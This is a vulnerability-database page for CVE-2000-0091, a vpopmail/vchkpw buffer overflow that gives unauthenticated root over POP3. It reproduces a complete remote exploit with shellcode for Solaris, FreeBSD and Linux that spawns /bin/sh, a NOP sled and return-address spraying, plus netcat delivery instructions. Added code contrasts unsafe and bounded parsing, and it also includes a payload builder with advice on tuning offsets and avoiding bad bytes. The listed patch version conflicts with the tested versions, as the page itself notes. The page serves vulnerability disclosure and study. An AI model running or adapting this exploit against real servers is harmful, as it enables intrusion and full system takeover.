CVE-2000-0091
CVSS 10.0
Published: 2000-01-21 00:00:00
Revised: 2008-09-10 15:02:53

[Original] Buffer overflow in vchkpw/vpopmail POP authentication package allows remote attackers to gain root privileges via a long username or password.


[CNNVD] Inter7 vpopmail (vchkpw) buffer overflow vulnerability (CNNVD-200001-052)

        The vchkpw/vpopmail POP authentication package contains a buffer overflow. A remote attacker can gain root privileges by supplying an overlong username or password.

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no special access conditions are needed to exploit]
Attack vector: [--]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/a:inter7:vpopmail:vchkpw_3.4.6
cpe:/a:inter7:vpopmail:vchkpw_3.4.9
cpe:/a:inter7:vpopmail:vchkpw_3.4.1
cpe:/a:inter7:vpopmail:vchkpw_3.4.3
cpe:/a:inter7:vpopmail:vchkpw_3.4.8
cpe:/a:inter7:vpopmail:vchkpw_3.4.5
cpe:/a:inter7:vpopmail:vchkpw_3.4.2
cpe:/a:inter7:vpopmail:vchkpw_3.4.4
cpe:/a:inter7:vpopmail:vchkpw_3.4.11
cpe:/a:inter7:vpopmail:vchkpw_3.4.7

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0091
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0091
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-052
(official data source) CNNVD

- Other links and resources

http://www.inter7.com/vpopmail/ChangeLog
(UNKNOWN)  MISC  http://www.inter7.com/vpopmail/ChangeLog
http://www.inter7.com/vpopmail/
(UNKNOWN)  MISC  http://www.inter7.com/vpopmail/
http://www.securityfocus.com/bid/942
(UNKNOWN)  BID  942

- Vulnerability information

Inter7 vpopmail (vchkpw) buffer overflow vulnerability
Critical  Buffer overflow
2000-01-21 00:00:00  2005-05-02 00:00:00
Remote / Local
        The vchkpw/vpopmail POP authentication package contains a buffer overflow. A remote attacker can gain root privileges by supplying an overlong username or password.

- Advisory and patch

        Inter7 has addressed this vulnerability as of version 3.1.11e. You can download the most recent version here:
        http://www.inter7.com/vpopmail/
        Note that the exploit reproduced below lists vpopmail-3.4.11[b-e] among the versions it was tested against, so confirm which release actually carries the fix against the ChangeLog linked above before relying on the version number quoted here.

- Vulnerability information (19727)

Inter7 vpopmail (vchkpw) <= 3.4.11 Buffer Overflow Vulnerability (EDBID:19727)
linux local
2000-01-21 Verified
0 k2
N/A
source: http://www.securityfocus.com/bid/942/info


Vpopmail (vchkpw) is a free GPL software package built to help manage virtual domains and non-/etc/passwd email accounts on Qmail mail servers. The package is developed by Inter7 (referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution.

Certain versions of this software are vulnerable to a remote buffer overflow in vpopmail's password authentication. vchkpw is the checkpassword-style helper that qmail's POP3 service hands the login to, so an overlong username or password reaches the vulnerable copy before any credential is validated, and the overflow executes with the privileges the helper was started with. That combination is why an unauthenticated remote client can end up with root.
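To make the bug class concrete, here is an added example that is not vpopmail's source and is not from this advisory: a minimal checkpassword-style helper that parses the fd 3 blob (username, password and timestamp, each NUL-terminated) with an unbounded strcpy(), beside a bounded parser that measures every field against both the buffer and the blob before copying. FIELD_MAX, the function names and the two sample blobs are assumptions constructed for the example.

```c
/*
 * Added example, not vpopmail's own code: a model of the bug class behind
 * CVE-2000-0091. A checkpassword-style helper receives one blob on fd 3 laid
 * out as  username NUL password NUL timestamp NUL ; both attacker-controlled
 * fields arrive before any credential is checked, and the helper runs with
 * the privileges the POP3 daemon gave it. FIELD_MAX, the function names and
 * the sample blobs are assumptions constructed for illustration.
 */
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 128   /* assumed buffer size; the real helper chose its own */

struct creds {
    char user[FIELD_MAX];
    char pass[FIELD_MAX];
};

/* VULNERABLE: strcpy() stops only at NUL, so a username of FIELD_MAX bytes
 * or more runs past user[] into pass[] and whatever follows on the stack.
 * This is the pattern the exploit below targets; never feed it untrusted
 * input. */
static void parse_unsafe(const char *blob, struct creds *c)
{
    const char *pass = blob + strlen(blob) + 1;
    strcpy(c->user, blob);
    strcpy(c->pass, pass);
}

/* HARDENED: locate each terminator inside the blob's known length, check the
 * field fits together with its NUL, and only then copy. Returns 0 on success,
 * -1 if a field is oversize or unterminated. */
static int parse_safe(const char *blob, size_t bloblen, struct creds *c)
{
    const char *unul = memchr(blob, '\0', bloblen);
    if (unul == NULL) return -1;                 /* username never terminated */
    size_t ulen = (size_t)(unul - blob);
    if (ulen >= FIELD_MAX) return -1;            /* would not fit with its NUL */

    const char *pass = unul + 1;
    size_t remain = bloblen - ulen - 1;
    const char *pnul = memchr(pass, '\0', remain);
    if (pnul == NULL) return -1;                 /* password never terminated */
    size_t plen = (size_t)(pnul - pass);
    if (plen >= FIELD_MAX) return -1;

    memcpy(c->user, blob, ulen + 1);             /* lengths proven to fit */
    memcpy(c->pass, pass, plen + 1);
    return 0;
}

/* Bytes an n-character username writes past user[] in parse_unsafe()
 * (0 when it fits); handy when sizing a proof of concept. */
static size_t overflow_bytes(size_t username_len)
{
    return username_len + 1 > FIELD_MAX ? username_len + 1 - FIELD_MAX : 0;
}

/* Constructed blob 1: a normal login. Both parsers must agree on it. */
static int demo_normal(void)
{
    static const char blob[] = "alice\0hunter2\0946684800\0";
    struct creds safe, unsafe;
    if (parse_safe(blob, sizeof blob, &safe) != 0) return -1;
    parse_unsafe(blob, &unsafe);                 /* benign input only */
    if (strcmp(safe.user, "alice") || strcmp(safe.pass, "hunter2")) return -1;
    return strcmp(safe.user, unsafe.user) == 0 &&
           strcmp(safe.pass, unsafe.pass) == 0 ? 0 : -1;
}

/* Constructed blob 2: a 300-byte username, the shape of the attack on this
 * page. parse_safe() must refuse it; parse_unsafe() would smash the stack. */
static int demo_oversize(void)
{
    char blob[310];
    struct creds c;
    memset(blob, 'A', 300);
    blob[300] = '\0';
    memcpy(blob + 301, "hunter2\0\0", 9);        /* password, then empty timestamp */
    return parse_safe(blob, sizeof blob, &c);
}

int main(void)
{
    printf("normal blob: %s\n",
           demo_normal() == 0 ? "accepted, both parsers agree" : "FAILED");
    printf("300-byte username: parse_safe %s; parse_unsafe would overrun user[] by %zu bytes\n",
           demo_oversize() == -1 ? "rejected it" : "accepted it?!", overflow_bytes(300));
    return 0;
}
```

Compile with cc -Wall and run it. The oversize blob is only ever handed to parse_safe(); parse_unsafe() exists to show the shape of the defect and would corrupt its own stack on that input exactly as the advisory describes.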

/*
   qmail-pop3d-vchkpw.c (v.3)
   by: K2,
      
   The inter7 supported vchkpw/vpopmail package (replacement for checkpassword)
   has big problems ;)

   gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
   ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110   

   play with the alignment to get it to A) crash B) work. 
   qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
   Tested against: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
   vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

   Hi plaguez.
   prop's to Interrupt for testing with bsd, _eixon an others ;)
   cheez shell's :)
   THX goes out to STARBUCKS*!($#!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define SIZE   260          /* bytes of USER argument sent to the server */
#define NOP    0x90
#ifdef SX86
#define DEFOFF 0x8047cfc    /* guessed stack address, Solaris/x86 */
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf   /* guessed stack address, FreeBSD/x86 */
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8   /* guessed stack address, Linux/x86 */
#define NOPDEF 81
#endif 

char *shell = 
#ifdef SX86 // Solaris IA32 shellcode, cheez
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"; 
#elif BSD // FreeBSD shellcode, mudge@l0pht.com
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
#else // Linux shellcode, no idea
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh\xff";
#endif

int main(int argc, char **argv)
{
   int i=0,offset=0,nop=NOPDEF;
   uint32_t esp=0;
   /* one spare word: the last address write may straddle SIZE, and %s below
      needs a terminator. The original declared exactly SIZE bytes and relied
      on undefined behaviour for both. */
   char buffer[SIZE+4];

   if (argc > 1) offset += strtol(argv[1], NULL, 0);   /* shifts the return address */
   if (argc > 2) nop += strtol(argv[2], NULL, 0);      /* shifts shellcode and slot phase */

   if (nop < 0 || (size_t)nop + strlen(shell) + 1 > SIZE) {
      fprintf(stderr,"alignment out of range for a %d byte buffer\n",SIZE);
      return(1);
   }

   esp = DEFOFF;
   
   /* layout: NOP sled | shellcode | return address repeated to the end */
   memset(buffer, NOP, SIZE);
   memcpy(buffer+nop, shell, strlen(shell));
   for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
      uint32_t addr = esp+offset;                /* little-endian host, as the original assumed */
      memcpy(&buffer[i], &addr, sizeof addr);
   }
   buffer[SIZE] = '\0';                          /* %s must stop after exactly SIZE bytes */
   
   printf("user %s\n",buffer);                   /* the payload rides in the USER field */
   printf("pass ADMR0X&*!(#&*(!\n");             /* filler; the password is never checked */

   fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",(int)strlen(buffer),nop,esp+offset);
   return(0);
}
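The following checker is an added example and is not part of K2's exploit or of vpopmail. It rebuilds the payload layout the exploit emits (NOP sled, shellcode, repeated return address) from the exploit's own Linux constants and verifies the constraints a payload delivered as a POP3 USER argument has to satisfy: no 0x00 byte, because the exploit prints it with %s and the vulnerable copy stops at NUL, and no 0x0a or 0x0d, because either ends the command line. It also reports the slot phase that the exploit's alignment argument sweeps. The shellcode is copied from the exploit; the function names and the contrasting target 0xbffffc0a are constructed for the example.

```c
/*
 * Added example, not part of K2's exploit: payload-constraint checks for the
 * shape the exploit above emits (NOP sled | shellcode | repeated return
 * address). Constants 260, 81 and 0xbffffcd8 and the 49-byte Linux shellcode
 * are taken from the exploit; everything else here is constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD 260             /* the exploit's SIZE */
#define NOP     0x90

static const unsigned char linux_sc[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh\xff";
#define LINUX_SC_LEN (sizeof(linux_sc) - 1)

/* Index of the first byte that would break delivery, or -1 if clean:
 * 0x00 ends the C string, 0x0a/0x0d end the POP3 command line. */
static int find_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == 0x0a || p[i] == 0x0d)
            return (int)i;
    return -1;
}

/* A return address is only usable if none of its little-endian bytes is bad. */
static int target_is_clean(uint32_t target)
{
    unsigned char b[4] = { target & 0xff, (target >> 8) & 0xff,
                           (target >> 16) & 0xff, (target >> 24) & 0xff };
    return find_bad_byte(b, 4) == -1;
}

/* Where the exploit's loop starts writing return-address slots. The second
 * command-line argument changes nops and therefore this index; first % 4 is
 * the slot phase you sweep when the saved return address is not 4-aligned
 * with the start of your buffer. */
static size_t first_slot(size_t nops, size_t sclen)
{
    return nops + sclen + 1;
}

/* Build the payload into out[PAYLOAD]. Unlike the exploit's loop, stop at the
 * last slot that fits entirely, so nothing is written past the buffer.
 * Returns the number of full slots written, or 0 if the shellcode does not fit. */
static size_t build_payload(unsigned char *out, size_t nops,
                            const unsigned char *sc, size_t sclen, uint32_t target)
{
    if (nops + sclen + 1 > PAYLOAD) return 0;
    memset(out, NOP, PAYLOAD);
    memcpy(out + nops, sc, sclen);
    size_t slots = 0;
    for (size_t i = first_slot(nops, sclen); i + 4 <= PAYLOAD; i += 4) {
        out[i]     = target & 0xff;           /* little-endian, as on x86 */
        out[i + 1] = (target >> 8) & 0xff;
        out[i + 2] = (target >> 16) & 0xff;
        out[i + 3] = (target >> 24) & 0xff;
        slots++;
    }
    return slots;
}

/* The exploit's Linux defaults: 81 NOPs, target 0xbffffcd8. Returns the slot
 * count when every byte is deliverable, -1 if any byte would break it. */
static int demo_linux_defaults(void)
{
    unsigned char buf[PAYLOAD];
    size_t slots = build_payload(buf, 81, linux_sc, LINUX_SC_LEN, 0xbffffcd8u);
    if (slots == 0 || find_bad_byte(buf, PAYLOAD) != -1) return -1;
    return (int)slots;
}

int main(void)
{
    printf("linux shellcode: %zu bytes, first bad byte at %d\n",
           LINUX_SC_LEN, find_bad_byte(linux_sc, LINUX_SC_LEN));
    printf("first slot at %zu (phase %zu), full slots written: %d\n",
           first_slot(81, LINUX_SC_LEN), first_slot(81, LINUX_SC_LEN) % 4,
           demo_linux_defaults());
    printf("target 0xbffffcd8 clean: %d, target 0xbffffc0a clean: %d\n",
           target_is_clean(0xbffffcd8u), target_is_clean(0xbffffc0au));
    return 0;
}
```

With the exploit's defaults the first slot lands at byte 131, phase 3, and 32 full slots fit before byte 260; the exploit's own loop would also start a 33rd, partial slot at byte 259, which is why the rewritten exploit above reserves a spare word. Run the target check before sweeping offsets: any candidate address containing 0x00, 0x0a or 0x0d cannot be delivered through this channel no matter how the alignment is tuned.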
		

- Vulnerability information

1204
vchkpw/vpopmail POP Authentication Multiple Field Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2000-01-22 Unknown
2000-01-22 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.